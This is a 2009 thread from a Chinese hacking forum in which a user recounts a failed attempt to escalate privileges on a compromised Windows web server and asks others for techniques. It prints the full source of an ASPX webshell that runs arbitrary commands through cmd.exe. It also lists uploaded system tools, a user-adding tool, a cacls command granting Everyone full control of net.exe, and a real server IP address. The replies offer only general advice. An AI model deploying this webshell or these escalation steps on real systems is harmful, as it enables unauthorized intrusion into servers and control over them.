【3.A.S.T】网络安全爱好者 - Powered by Discuz! Board

标题: 失败提权的笔记AND提权问题 [打印本页]

作者: khjl1 时间: 2009-3-3 12:38 标题: 失败提权的笔记AND提权问题

本人失败的提权过程...都写出来了...希望哪位大牛一起来交流下...
wscript.shell √ 命令行执行组件组建没被删...
自己上传了个CMD.exe  输入路径  但是都是没有权限.换了几个路径都一样
上传了个ASPX马  支持ASPX  但是没办法跳目录..
CMD.ASPX
代码如下
<%@ Page Language="C#" AutoEventWireup="true" %>
<%@ Import Namespace="System.Runtime.InteropServices" %>
<%@ Import Namespace="System.IO" %>
<%@ Import Namespace="System.Data" %>
<%@ Import Namespace="System.Reflection" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.Web" %>
<%@ Import Namespace="System.Web.UI" %>
<%@ Import Namespace="System.Web.UI.WebControls" %>

<script runat="server">
protected void exec(object sender, EventArgs e)
{
string item = cmd.Text;
Process p = new Process();
p.StartInfo.FileName = "cmd.exe";
p.StartInfo.UseShellExecute = false;
p.StartInfo.RedirectStandardInput = true;
p.StartInfo.RedirectStandardOutput = true;
p.StartInfo.RedirectStandardError = true;
p.StartInfo.CreateNoWindow = true;
string strOutput = null;
p.Start();
p.StandardInput.WriteLine(item);
p.StandardInput.WriteLine("exit");
strOutput = p.StandardOutput.ReadToEnd();
p.WaitForExit();
p.Close();
Response.Write("<pre>");
Response.Write(strOutput);
Response.Write("</pre>");
}
protected void Page_Load(object sender, EventArgs e)
{
}
</script>
<form id="form1" runat="server">
<asp:TextBox id="cmd" runat="server" Text="dir c:\" /><asp:Button id="btn"
runat="server" Text="execute" />
</form>

访问出错了...
接着换了个调用CMD.EXE执行命令的ASPX马
可以执行命令...
除了DIR  什么也执行不了 net net1 ipconfig netstat....都一样
所以自己上传了个NET.EXE和IPCONFIG.EXE NETSTAT.EXE
执行whoami
nt authority\network service
NET.EXE不能执行  其余的2个都能正常执行
还有一个麻烦的事
有一流监控
一流信息监控拦截系统提醒您：很抱歉，由于您提交的内容中或访问的内容中含有系统不允许的关键词或
者您的IP受到了访问限制，本次操作无效，系统已记录您的IP及您提交的所有数据。请注意，不要提交任
何违反国家规定的内容！本次拦截的相关信息为：
最开始也看了下FTP
Connected to 60.191.248.113.
220 Microsoft FTP Service
User (60.191.248.113:(none)):
这个没办法利用吧...

试了写个批处理和VBS
直接在CMD里执行都执行不了
传了个狼牙写的无NET加用户
也加不上
dir C:\
发现有perl目录
记得看过利用perl来提权的教程..
但是后来发现里面是个空文件夹
perl提生权限..失败..
后来又试了下CACLS  想改变下目录的访问权限
输入
/c c:\var\cacls.exe C:\windows\system32\net.exe  /t /e /c /g everyone:f
被拦截了
/c c:\var\cacls C:\windows\system32\net.exe  /t /e /c /g everyone:f
成功执行
ACCESS_DENIED: C:\windows\system32\net.exe
试了下
/c C:\windows\system32\net.exe user
结果还是没有半点回显
又试了下
/C c:\var\cacls C:\windows\system32\net2.exe  /t /e /c /g everyone:f
没回显
那NET.EXE应该是存在才对的啊
但是为什么还是没办法呢
所以又去百度了下..
在一帖子中看到有人说运行CACLS得系统权限
也有人说回显是假的...一阵狂晕啊
因为没有利用CACLS提权过所以不知道是真是假...
帖子地址:
http://bbs.hackerxfiles.net/thread-90266-1-1.html
哪位知道怎么用CACLS来提权?该怎么提..需要什么权限?
或者还有什么别的提权方法...
说得够详细了吧  还有上面有哪些地方错了希望能指点下..因为本人提权很烂..希望能多学些提权方法..呵呵...
大牛们一起来讨论下吧...

作者: 3ast 时间: 2009-3-3 13:54

看的都晕了

作者: koycon 时间: 2009-3-3 16:07

KH你怎么也在.....

作者: wmmy 时间: 2009-3-4 13:44

服务器上设置的严格.  网上流传的常见提权方法都试过了吗？
主机是什么系统，开了哪些端口，上面又有哪些软件  估计单就从WEBSHELL提权很难
综合这个主机来试试

个人意见` 看下楼  :lol

作者: 柔肠寸断 时间: 2009-3-5 19:12 标题: 回复 4楼 wmmy 的帖子

对，对于webshell提权很难的情况下可以看看主机自生的安全设置

当然，不是所有的主机都是可以成功的，如果不成功就不用再浪费时间了

欢迎光临【3.A.S.T】网络安全爱好者 (http://3ast.com/)